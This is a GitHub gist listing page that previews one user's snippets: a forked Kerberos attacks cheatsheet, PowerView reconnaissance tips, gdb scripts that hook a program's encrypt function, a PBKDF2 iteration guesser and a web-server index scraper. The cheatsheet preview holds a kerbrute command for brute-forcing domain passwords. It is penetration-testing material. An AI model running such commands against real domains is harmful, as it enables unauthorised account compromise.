@robvinson
robvinson / kerberos_attacks_cheatsheet.md
Created Jul 25, 2020 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@robvinson
robvinson / PowerView-3.0-tricks.ps1
Created Jun 25, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View test
View keybase.md

Keybase proof

I hereby claim:

  • I am robvinson on github.
  • I am robvinson (https://keybase.io/robvinson) on keybase.
  • I have a public key whose fingerprint is A820 6BA2 B5A5 D565 5BBD 8F76 50EB 0F9C B6B6 8E33

To claim this, I am signing this object:

View iteration-guesser.rb
#!/usr/bin/env ruby
require 'openssl'
SHA1 = OpenSSL::Digest::SHA1.new
# Verified functionality against
# Test Vector (http://tools.ietf.org/html/draft-josefsson-pbkdf2-test-vectors-06#page-3)
# Input:
# P = "password" (8 octets)
View parse_encrypt_dump_file.c
/*
To be used with an output file created by breaking
on the encrypt function with gdb, and grabbing its
parameter:
attach --waitfor SomeProgram
break encrypt
commands
silent
View tracer.gdb
set logging file /tmp/Good-log.txt
set logging on
attach --waitfor Good
### Generic objective-c tracing
b objc_msgSend
commands
silent
# print class name and method name
printf "-[%s %s]\n", (char *)class_getName(*(long *)$r0,$r1),$r1
@robvinson
robvinson / gist:3504621
Created Aug 28, 2012
ruby preforking test program
View gist:3504621
#!/usr/bin/env ruby
# The trap is guaranteed to happen, and guaranteed to happen only
# once, right before the process exits for any reason (unless
# it's terminated with a SIGKILL).
#trap('EXIT') { acceptor.close }
CONTROL = []
CONTROL[0], CONTROL[1] = IO.pipe
@robvinson
robvinson / dl.sh
Created May 18, 2012
Get index page from web servers
View dl.sh
#!/bin/sh
DSTDIR=80open
mkdir "$DSTDIR"
is_empty() {
    if [ -s "$1" ]; then # exists and is not empty
        return 1
    else
        if [ -f "$1" ]; then # file exists and is empty